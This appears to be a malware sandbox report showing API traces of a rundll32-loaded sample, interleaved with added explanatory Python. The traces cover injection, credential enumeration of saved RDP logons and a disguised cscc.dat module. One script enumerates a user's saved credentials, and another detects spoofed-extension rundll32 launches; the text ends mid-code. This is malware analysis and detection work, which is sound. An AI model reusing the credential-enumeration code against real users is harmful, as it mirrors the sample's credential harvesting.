                                              • ResumeThread.KERNEL32(?,?,04BFA15C,?,?), ref: 04BF991C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,04BFA15C,?,?), ref: 04BF992C
                                              • GetLastError.KERNEL32(?,04BFA15C,?,?), ref: 04BF9934
                                              • CloseHandle.KERNEL32(?,?,04BFA15C,?,?), ref: 04BF993D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                              • String ID:
                                              • API String ID: 298440786-0
                                              • Opcode ID: f95ab8df61a72f594e2c1dffb1435c0d9aac694ac7dcde9658f861126380220b
                                              • Instruction ID: b4d35dd1fef43d25676a32b0cd5b1015ba5cc3bee99cfd8dea8449bf463d6e21
                                              • Opcode Fuzzy Hash: f95ab8df61a72f594e2c1dffb1435c0d9aac694ac7dcde9658f861126380220b
                                              • Instruction Fuzzy Hash: 722141B5A00109BFDF009FE4DC8499EB77CEF48314F1145A6EB1AE3150D734AE199B60
                                              APIs
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • wsprintfW.USER32 ref: 04BF6758
                                              • EnterCriticalSection.KERNEL32(04C07B9C,?,00000000,00000000), ref: 04BF6783
                                              • StrCatW.SHLWAPI(?,?), ref: 04BF67D1
                                              • StrCatW.SHLWAPI(?,04C03B90), ref: 04BF67D7
                                              • SetLastError.KERNEL32(0000007A), ref: 04BF67DF
                                              • LeaveCriticalSection.KERNEL32(04C07B9C), ref: 04BF67EA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                              • String ID:
                                              • API String ID: 230659905-0
                                              • Opcode ID: 0bde28aa62ad7e0ea5733dee1abffb05585599bd5701f3b21509661e63418598
                                              • Instruction ID: f400ad3ac211b1abccea411cc0a49e42d10687cc208539d0c06eaf1dd5d9dde4
                                              • Opcode Fuzzy Hash: 0bde28aa62ad7e0ea5733dee1abffb05585599bd5701f3b21509661e63418598
                                              • Instruction Fuzzy Hash: 6E11E9316001049BDB106BA8DC49B9A7769EF44344F0489A1FE4EDB190EA74FE49CFD1
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,04BFA016,00000000,00000004,00000000), ref: 04BFA3C9
                                              • SetThreadToken.ADVAPI32(?,?,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA3DD
                                              • ResumeThread.KERNEL32(?,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA3EA
                                              • GetLastError.KERNEL32(?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA3F7
                                              • CloseHandle.KERNEL32(?,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA402
                                              • SetLastError.KERNEL32(00000057,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA411
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                              • String ID:
                                              • API String ID: 2435877492-0
                                              • Opcode ID: 2458d703f53fd22195ef30dc9ee5d03c81860986c8963199d96c1f27bd2a00d6
                                              • Instruction ID: bbc6b6a4b9534f9230b03577370134523d10889937ebf747a72964a97c4cf23b
                                              • Opcode Fuzzy Hash: 2458d703f53fd22195ef30dc9ee5d03c81860986c8963199d96c1f27bd2a00d6
                                              • Instruction Fuzzy Hash: E5018F30601114FBDB208FA5ED0DD9E7E7CEB89764B100052FA0EE2140D7749A45EAA0
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,04BF7957,00000000,00000004,00000000), ref: 04BF7988
                                              • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF799C
                                              • ResumeThread.KERNEL32(?,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79A9
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79B9
                                              • GetLastError.KERNEL32(?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79C1
                                              • CloseHandle.KERNEL32(?,?,?,?,04BF7B4A,?,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BF79CA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                              • String ID:
                                              • API String ID: 1168161173-0
                                              • Opcode ID: 12a7061751cf7c99bb7f0de9601b7a868dca558c8d5edc6fc1a696ddf73c5aac
                                              • Instruction ID: 459d6dc7eba389e81b65b7817232b12fc71f9d702e24969a904a77eddf923836
                                              • Opcode Fuzzy Hash: 12a7061751cf7c99bb7f0de9601b7a868dca558c8d5edc6fc1a696ddf73c5aac
                                              • Instruction Fuzzy Hash: B6F03C7050020AFBEF009BA0DD0AF9D7B78EB04315F204291B61AE24E0DB74EA149B64
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04BF4E76
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4E79
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF4F2A
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4F2D
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04BF4F32
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4F35
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Alloc
                                              • String ID:
                                              • API String ID: 3689955550-0
                                              • Opcode ID: 9dfbb638b4dd6d0695b1fae72552ecd06425cd3d63c00908ea2fc8d3bfcd017a
                                              • Instruction ID: 71e44da28ccf43907af451b991ff1d01c3ca17821e7f1c80bf545f8ec0c32192
                                              • Opcode Fuzzy Hash: 9dfbb638b4dd6d0695b1fae72552ecd06425cd3d63c00908ea2fc8d3bfcd017a
                                              • Instruction Fuzzy Hash: D9213431684244BAEB219FA4CC04FAF7FB8EF65715F008489F68D9B2D0DA75A90DC760
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000034,771AF380,00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000), ref: 04BF50B3
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04BF50BA
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76775200), ref: 04BF5148
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000,00000000), ref: 04BF514F
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76775200,?,?,?,04BF52FD,?), ref: 04BF5158
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 04BF515F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Alloc
                                              • String ID:
                                              • API String ID: 3689955550-0
                                              • Opcode ID: 746eeb07a6b00bb745ddabbaef740234bb2c30a2dcb0ea99c45faec819779bc2
                                              • Instruction ID: 96395ffb3bb3b2fcdacc12666e5011b5319298b0db4af05ed2e354dc675635a3
                                              • Opcode Fuzzy Hash: 746eeb07a6b00bb745ddabbaef740234bb2c30a2dcb0ea99c45faec819779bc2
                                              • Instruction Fuzzy Hash: 0221A172540249BAEF218FA4DC49FAA3B6CEF44315F044086FE49AB181C6B5AD19DBB0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,04BF47E5,?,?,00000000,?,?,?,?,?,?), ref: 04BF318E
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04BF3195
                                              • rand.MSVCRT ref: 04BF31AF
                                              • rand.MSVCRT ref: 04BF31BD
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,04BF47E5,?,?,00000000,?), ref: 04BF31F4
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04BF31FB
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Processrand$AllocFree
                                              • String ID:
                                              • API String ID: 1335519115-0
                                              • Opcode ID: ecfba4219cd7e524ea020a3621180cdabbc0cbc7cdd0bb3ea5076f3c6ff06853
                                              • Instruction ID: 60e6725bb1857a52394bfc194f9d389d6c1aad0e106251c0a581507b74ab8e04
                                              • Opcode Fuzzy Hash: ecfba4219cd7e524ea020a3621180cdabbc0cbc7cdd0bb3ea5076f3c6ff06853
                                              • Instruction Fuzzy Hash: DC11A532500305BBEB019BD5CC45F9E7F69EF85750F004099FA099B180CA7AA959D770
                                              APIs
                                                • Part of subcall function 04BF88D3: PathFindFileNameW.SHLWAPI(04C07BC8,75A373E0,?,04BF95B2), ref: 04BF88E3
                                              • wsprintfW.USER32 ref: 04BF9AAF
                                              • wsprintfW.USER32 ref: 04BF9B0D
                                              • wsprintfW.USER32 ref: 04BF9B56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: wsprintf$FileFindNamePath
                                              • String ID: \"C:\Windows\%s\" #1
                                              • API String ID: 988121887-1875761687
                                              • Opcode ID: e47f72e9c01eb9d82f4d141538db7c470b604bd0c7c226c58faebf3031c3ac79
                                              • Instruction ID: a70ed57be5c47925fd5906acb1ccb1a055205d50e6a3289bc41eb496f3a07fdd
                                              • Opcode Fuzzy Hash: e47f72e9c01eb9d82f4d141538db7c470b604bd0c7c226c58faebf3031c3ac79
                                              • Instruction Fuzzy Hash: 3D518523E24358A5DB20DFD4EC01BEFB775FF447A0F14606AE608AB290F6B15941C799
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04BF7170,00000000,?,04BF7AF8), ref: 04BF6F8E
                                              • GetProcAddress.KERNEL32(00000000), ref: 04BF6F95
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: IsWow64Process$kernel32.dll
                                              • API String ID: 1646373207-3024904723
                                              • Opcode ID: 3fc350f417f6a4db8a4f255e2df4785725d7e04788ef3be8b82d521f37940dd3
                                              • Instruction ID: 4afbfb14a2842cfa89ef946132495dd054466cf9bc3f1198050898321ac582aa
                                              • Opcode Fuzzy Hash: 3fc350f417f6a4db8a4f255e2df4785725d7e04788ef3be8b82d521f37940dd3
                                              • Instruction Fuzzy Hash: DFD01271610209BBDB10DBD4DD0AE9DB76DDB15749F108454B50BD2080DBB9EB119F64
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,771AF380,76775200,00000000,?,00000000,00000000,00000000), ref: 04BF4C14
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4C1B
                                              • rand.MSVCRT ref: 04BF4CE6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: Heap$AllocProcessrand
                                              • String ID: 8
                                              • API String ID: 1878709018-4194326291
                                              • Opcode ID: 09c4df24cae50829efdbfe27f07af5e946d2971b2ea2e806d669a2f49387f873
                                              • Instruction ID: 1cb499639027d7b000771b47441f396014f02e5afe7b7bafd2262ca7da225498
                                              • Opcode Fuzzy Hash: 09c4df24cae50829efdbfe27f07af5e946d2971b2ea2e806d669a2f49387f873
                                              • Instruction Fuzzy Hash: 39B12635A042569FCB168F6C88642FA7FF1EF16318F2481D9D9C9EB202D635E94EC740
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04BF79FC,?,?,?), ref: 04BF927B
                                              • memcpy.MSVCRT ref: 04BF9294
                                              • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04BF9303
                                              • VirtualFree.KERNEL32(00000000,?,00004000), ref: 04BF9323
                                                • Part of subcall function 04BF8F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04BF8F52
                                                • Part of subcall function 04BF8F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,03216810), ref: 04BF8FB0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: Virtual$Protect$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 2644210-0
                                              • Opcode ID: 7911e8e2f09c1265fc7929dd1e950474d14d9888725bb2e244ccb964edc5ad48
                                              • Instruction ID: b235477eae765d13d49ed1ccedfa816f83a294c0f10b8538dc8fc5bb15643aa4
                                              • Opcode Fuzzy Hash: 7911e8e2f09c1265fc7929dd1e950474d14d9888725bb2e244ccb964edc5ad48
                                              • Instruction Fuzzy Hash: 7821D8F1701202ABDF249FA99C44F9BB79CEB45759F0501A9BB1DE3290DA74F844C7A0
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF8571
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04BF858F
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04BF85E4
                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04BF85EF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: 6ada38f47a96646c534153690c0fac611822d1a4ba4d915ed951b661e5b79bbc
                                              • Instruction ID: d0518373d85cd01878dadf427cc795b25751884c4f0f749d7f5acba7a0924590
                                              • Opcode Fuzzy Hash: 6ada38f47a96646c534153690c0fac611822d1a4ba4d915ed951b661e5b79bbc
                                              • Instruction Fuzzy Hash: 3801B9635056146BDA3079A89C4CAAF765DD749320F1407D2EF1ED30D0E734BA884A61
                                              APIs
                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 04BF770B
                                              • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 04BF77C3
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: Cred$EnumerateFree
                                              • String ID: TERMSRV/
                                              • API String ID: 3403564193-3001602198
                                              • Opcode ID: 2b3e1d372f89d8aa2eb83641b87dff5f837532b84418e07d2bc9b381215b3a33
                                              • Instruction ID: eaeaa0ffaad61650705e47197272af0a54cdccbb5e1a5078223f713bd3d25ac3
                                              • Opcode Fuzzy Hash: 2b3e1d372f89d8aa2eb83641b87dff5f837532b84418e07d2bc9b381215b3a33
                                              • Instruction Fuzzy Hash: F4218172A20105EFDF14DFA5CDC48AEB7BAFF44314B5584FAD20AA7210DB30A989DB50
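
The CredEnumerateW call in the block above deserves a close read: its first recorded argument is 00000000, a NULL filter, so the code asks Credential Manager for every saved credential of the current user and then matches the TERMSRV/ prefix (this function's String ID) itself to pick out saved Remote Desktop logons. The Python below is an added example, not code from the report or from the sample. It audits the same thing from the defender's side: the host-to-username map such a sweep yields for the current user, plus the cmdkey /delete lines that remove those saved logons. On Windows it calls advapi32!CredEnumerateW through ctypes with the same NULL filter; elsewhere it runs on the constructed records at the bottom. Windows normally does not hand the password blob of a domain-type credential to an ordinary CredEnumerateW caller, so what this enumeration reveals is which hosts and accounts are reachable rather than the secrets themselves; how the sample gets further than that is not shown by the trace.

```python
"""Audit of saved Remote Desktop credentials: what a NULL-filter CredEnumerateW
sweep followed by a TERMSRV/ prefix match yields for the current user.
Added example; the records at the bottom are constructed."""
import sys
from dataclasses import dataclass

CRED_TYPE_GENERIC = 1
CRED_TYPE_DOMAIN_PASSWORD = 2
CRED_PERSIST_LOCAL_MACHINE = 2
CRED_PERSIST_ENTERPRISE = 3
TERMSRV_PREFIX = "TERMSRV/"


@dataclass
class SavedCredential:
    target: str        # e.g. "TERMSRV/fileserver01"
    username: str      # e.g. "CORP\\backup-admin"
    cred_type: int
    persist: int
    blob_size: int     # bytes of secret handed back to the caller (0 if withheld)


def enumerate_windows(filter_=None) -> list:
    """Real enumeration via advapi32!CredEnumerateW (Windows only).
    filter_=None mirrors the sample's call: every credential, no filter."""
    import ctypes
    from ctypes import wintypes as wt

    class CREDENTIALW(ctypes.Structure):
        _fields_ = [("Flags", wt.DWORD), ("Type", wt.DWORD),
                    ("TargetName", wt.LPWSTR), ("Comment", wt.LPWSTR),
                    ("LastWritten", wt.FILETIME), ("CredentialBlobSize", wt.DWORD),
                    ("CredentialBlob", wt.LPBYTE), ("Persist", wt.DWORD),
                    ("AttributeCount", wt.DWORD), ("Attributes", ctypes.c_void_p),
                    ("TargetAlias", wt.LPWSTR), ("UserName", wt.LPWSTR)]

    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    count = wt.DWORD(0)
    creds = ctypes.POINTER(ctypes.POINTER(CREDENTIALW))()
    if not advapi32.CredEnumerateW(filter_, 0, ctypes.byref(count), ctypes.byref(creds)):
        return []            # ERROR_NOT_FOUND when the store is empty
    try:
        return [SavedCredential(c.TargetName, c.UserName or "", c.Type, c.Persist,
                                c.CredentialBlobSize)
                for c in (creds[i].contents for i in range(count.value))]
    finally:
        advapi32.CredFree(creds)


def rdp_targets(creds) -> dict:
    """Host -> saved usernames, the map the enumerate-and-match loop in the
    trace produces.  The prefix is compared case-insensitively to be safe."""
    by_host = {}
    for c in creds:
        if not c.target.upper().startswith(TERMSRV_PREFIX):
            continue
        host = c.target[len(TERMSRV_PREFIX):].lower()
        by_host.setdefault(host, []).append(c.username)
    return by_host


def cleanup_commands(by_host) -> list:
    """cmdkey lines that remove the saved logons (run as the affected user)."""
    return [f"cmdkey /delete:TERMSRV/{host}" for host in sorted(by_host)]


# Constructed records, not from the report.  blob_size 0 on the domain-type
# entries reflects that the API withholds that secret from an ordinary caller.
SAMPLE_CREDS = [
    SavedCredential("TERMSRV/fileserver01", "CORP\\backup-admin",
                    CRED_TYPE_DOMAIN_PASSWORD, CRED_PERSIST_ENTERPRISE, 0),
    SavedCredential("TERMSRV/fileserver01", "fileserver01\\localadmin",
                    CRED_TYPE_DOMAIN_PASSWORD, CRED_PERSIST_LOCAL_MACHINE, 0),
    SavedCredential("termsrv/jump-host.corp.example", "CORP\\alice",
                    CRED_TYPE_DOMAIN_PASSWORD, CRED_PERSIST_ENTERPRISE, 0),
    SavedCredential("git:https://github.com", "alice",
                    CRED_TYPE_GENERIC, CRED_PERSIST_LOCAL_MACHINE, 40),
]


def load_credentials() -> list:
    return enumerate_windows() if sys.platform == "win32" else SAMPLE_CREDS


if __name__ == "__main__":
    hosts = rdp_targets(load_credentials())
    for host, users in sorted(hosts.items()):
        print(f"{host}: {', '.join(users)}")
    print("\n".join(cleanup_commands(hosts)))
```

Run as the user whose profile is being checked; every host the script prints is one the sample could have reached with that user's saved logon, which is the list to rotate and to prune with the printed cmdkey lines.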
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: gethostbynamewsprintf
                                              • String ID: %u.%u.%u.%u
                                              • API String ID: 3411498959-1542503432
                                              • Opcode ID: d9181458e9a090d8ce525a726719e03edc023a7b7a13c94e0fd72ed67d2d74d0
                                              • Instruction ID: 49fa2678dd2ba9f3df0f120c006d57537a5bbd2deef65aa6b3d2b700ca56b0c1
                                              • Opcode Fuzzy Hash: d9181458e9a090d8ce525a726719e03edc023a7b7a13c94e0fd72ed67d2d74d0
                                              • Instruction Fuzzy Hash: 66E092B12040646F87051B9ADC58C36FFECDF0965270981D6FA8ACB172C629DA20EBF4
                                              APIs
                                              • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04BF7EA6,?), ref: 04BF7E7C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              Similarity
                                              • API ID: CombinePath
                                              • String ID: C:\Windows\$cscc.dat
                                              • API String ID: 3422762182-1946977352
                                              • Opcode ID: 167c288cfa122cba70ef4ef6a15df2ee6d87f90f2dbe0ca0c341c33829753d05
                                              • Instruction ID: 698626079c525ca82daad9d888a1f34d2cc7bb154db0af598f9d8ba6df3531d9
                                              • Opcode Fuzzy Hash: 167c288cfa122cba70ef4ef6a15df2ee6d87f90f2dbe0ca0c341c33829753d05
                                              • Instruction Fuzzy Hash: 83C012713C02242345111AD6AC05A56BAADDB19AA2301C172BA09D2040C995E92196E4
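
Two of the blocks above describe pieces of one command line. The wsprintf format "C:\Windows\%s" #1 (API ID wsprintf$FileFindNamePath) is the argument syntax rundll32 accepts, a quoted module path followed by an export ordinal, and PathCombineW(C:\Windows\, cscc.dat) yields a module whose extension is .dat rather than .dll, which is what the page's Sigma hit "Execute DLL with spoofed extension" keys on. The trace does not show the process-creation or WMI call that ties the two together, so read the pairing as an inference. The Python below is an added example, not part of the report: the detection logic for that pattern run over constructed process-creation events with Sysmon event 1 style fields. It parses the rundll32 argument forms path,Export, path,#n and path #n, and flags a non-DLL extension, a call by ordinal, and a module sitting directly under C:\Windows. The extension allowlist is my assumption.

```python
"""Detection for rundll32 loading a module with a spoofed (non-.dll) extension,
optionally by export ordinal.  Added example; the events are constructed."""
import re

# Extensions rundll32 is legitimately asked to load (assumption for this example).
NORMAL_MODULE_EXTENSIONS = {".dll", ".cpl", ".ocx", ".ax", ".drv", ".acm"}


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1]


def _ext(path: str) -> str:
    name = _basename(path)
    return name[name.rfind("."):].lower() if "." in name else ""


def split_windows_args(cmdline: str) -> list:
    """Minimal Windows argv splitter: whitespace separates, double quotes group.
    Backslash-escape rules are ignored, which is fine for rundll32 lines."""
    args, cur, in_quotes, have_arg = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes, have_arg = not in_quotes, True
        elif ch.isspace() and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
        else:
            cur.append(ch)
            have_arg = True
    if have_arg:
        args.append("".join(cur))
    return args


def parse_rundll32(cmdline: str):
    """Return (module_path, entry) for a rundll32 command line, else None.

    rundll32 takes <path>,<Export> / <path>,#<ordinal> / <path> #<ordinal>;
    the entry may be glued to the path with a comma or be the next argument."""
    args = split_windows_args(cmdline)
    if len(args) < 2 or _basename(args[0]).lower() not in ("rundll32.exe", "rundll32"):
        return None
    module, _, entry = args[1].partition(",")
    entry = entry.strip()
    if not entry and len(args) >= 3:
        entry = args[2].lstrip(",").strip()
    return module, entry


def analyse_event(event: dict) -> list:
    """Findings for one process-creation event (Sysmon event 1 style fields)."""
    parsed = parse_rundll32(event.get("CommandLine", ""))
    if parsed is None:
        return []
    module, entry = parsed
    findings = []
    ext = _ext(module)
    if ext not in NORMAL_MODULE_EXTENSIONS:
        findings.append(f"rundll32 loads non-DLL extension {ext or '(none)'}: {module}")
    if re.fullmatch(r"#\d+", entry):
        findings.append(f"export called by ordinal {entry}, hiding the export name")
    parts = re.split(r"[\\/]", module.lower())
    if parts[:2] == ["c:", "windows"] and len(parts) == 3:
        findings.append("module dropped directly under C:\\Windows")
    return findings


def scan(events) -> list:
    """(ProcessId, finding) pairs for every event that matches."""
    return [(e["ProcessId"], f) for e in events for f in analyse_event(e)]


# Constructed sample events, not taken from the sandbox report.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'C:\Windows\System32\rundll32.exe "C:\Windows\cscc.dat" #1'},
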